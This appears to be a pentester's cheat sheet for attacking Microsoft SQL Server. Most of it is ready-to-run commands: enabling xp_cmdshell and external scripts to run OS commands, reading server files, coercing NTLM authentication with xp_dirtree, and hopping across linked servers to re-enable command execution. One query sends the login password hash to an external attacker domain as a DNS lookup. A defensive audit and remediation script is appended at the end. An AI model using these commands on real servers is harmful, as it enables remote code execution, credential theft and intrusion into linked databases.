MSSQL

  • Port: 1433
  • Protocol: tcp

Tools

PowerUpSQL

PowerUpSQL is a collection of PowerShell scripts that help enumerate and interact with MSSQL databases.

Get domain MSSQL databases

Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo

Query a database

Get-SQLQuery -Instance "${dbIp},${dbPort}" -Query "${sqlQuery}"

mssql-cli

mssql-cli is a Python CLI tool that can be used to get an interactive session with the database:

# dbName is optional
mssql-cli -S ${dbIp} -d ${dbName} -U ${username} -P ${password}

RCE

Run external script

On Azure MSSQL it is possible to run an external Python or R script with the following command:

EXEC sp_execute_external_script @language = N'R',
@script = N'data.frame(print(system("cmd.exe /C whoami", intern=T)))'

Or, with a Python script:

EXEC sp_configure 'show advanced options', 1;
GO
RECONFIGURE;
GO
EXEC sp_configure 'external scripts enabled', 1;
GO
RECONFIGURE;
GO
EXEC sp_execute_external_script @language = N'Python' , @script = N'import subprocess;
cmd = ["whoami","ipconfig"];
a = "";
for c in cmd:
    a += subprocess.check_output(c.split(" "), shell=True).decode()+"\r\n";
a = [elt for elt in a.split("\r\n") if elt.strip() != ""];
a = "\n".join(a);
print(a);
'
GO

xp_cmdshell

xp_cmdshell is a procedure that will execute a system command. It can be activated using the following commands:

EXEC sp_configure 'show advanced options', 1;
GO
RECONFIGURE;
GO
EXEC sp_configure 'xp_cmdshell', 1;
GO
RECONFIGURE;
GO

Then:

EXEC xp_cmdshell 'whoami';

File system enumeration

Ole Automation Procedures should be activated to access some file system procedures:

sp_configure 'show advanced options', 1;
GO
RECONFIGURE;
GO
sp_configure 'Ole Automation Procedures', 1;
GO
RECONFIGURE;
GO

Enumerate the files

SELECT * FROM sys.dm_os_enumerate_filesystem('C:\', '*');

Read file content

SELECT * FROM OPENROWSET(BULK N'C:\Windows\win.ini', SINGLE_CLOB) AS Contents

NTLM coercion

It is possible to coerce MSSQL into performing an authenticated request against a chosen server in order to relay or capture the NetNTLM hash:

EXEC xp_dirtree '\\${ip}\foo', 1, 1

Introspection

It is possible to retrieve the currently executed SQL command with the following query:

SELECT s.TEXT FROM sys.dm_exec_requests CROSS APPLY sys.dm_exec_sql_text(sql_handle) AS s WHERE s.TEXT LIKE '%6744j%';

DNS exfiltration

The fn_trace_gettable function can be used for DNS exfiltration: the UNC path it is given is resolved by the server, so a value embedded in the hostname ends up in a DNS query to the attacker-controlled domain.

-- The .trc extension is mandatory.
-- Make sure to encode the output so that it is a valid DNS label (RFC 1035).
SELECT 1 FROM fn_trace_gettable('\\'+(SELECT TOP 1 password_hash FROM sys.sql_logins)+'-771.d.gotraffic.fr\.trc', default);

Lateral Movement

MSSQL servers can be linked to each other. Once a server is compromised, it may be possible to compromise the other MSSQL instances linked to it.

The following query can be used to find linked MSSQL instances:

SELECT * FROM master..sysservers;

Likewise, PowerUpSQL can be used to automate the discovery of remote instances:

powershell Get-SQLServerLinkCrawl -Instance "${initialDbIp},1433"

Then, the remote instance can be queried using the following request:

SELECT * FROM OPENQUERY("${dbIp}", '${sqlQuery}');

It is also possible to modify the remote MSSQL parameters using the following command:

EXEC('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT [${dbIp}]
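For defenders, the following T-SQL audit is an added example (not part of the original page) that reports whether the server options used in the sections above are currently enabled and which linked servers and login mappings exist; the views and columns are from the SQL Server catalog, and the option list is limited to the features this page covers.

```sql
-- Audit the server-level options abused on this page. Run on each instance
-- as a login that can read sys.configurations (public by default).
SELECT name,
       CAST(value_in_use AS int) AS value_in_use,
       CASE WHEN CAST(value_in_use AS int) = 1 THEN 'REVIEW' ELSE 'ok' END AS finding
FROM sys.configurations
WHERE name IN ('xp_cmdshell',
               'Ole Automation Procedures',
               'external scripts enabled')
ORDER BY name;

-- Linked servers and their credential mappings. A link whose mapping uses a
-- fixed remote login (remote_name) or self-credentials for every local login
-- (local_principal_id = 0) is what OPENQUERY / EXEC ... AT rely on to hop.
SELECT s.name               AS linked_server,
       s.data_source,
       s.is_rpc_out_enabled,                 -- needed for EXEC ... AT
       ll.local_principal_id,                -- 0 = applies to all logins
       ll.uses_self_credential,
       ll.remote_name
FROM sys.servers AS s
LEFT JOIN sys.linked_logins AS ll ON ll.server_id = s.server_id
WHERE s.is_linked = 1
ORDER BY s.name;

-- Remediation once a legitimate need has been ruled out (shown for
-- xp_cmdshell; repeat with the other option names as required).
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
```

Changes made through sp_configure are also recorded by the default trace, so a value_in_use flip that nobody scheduled is worth correlating with it.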
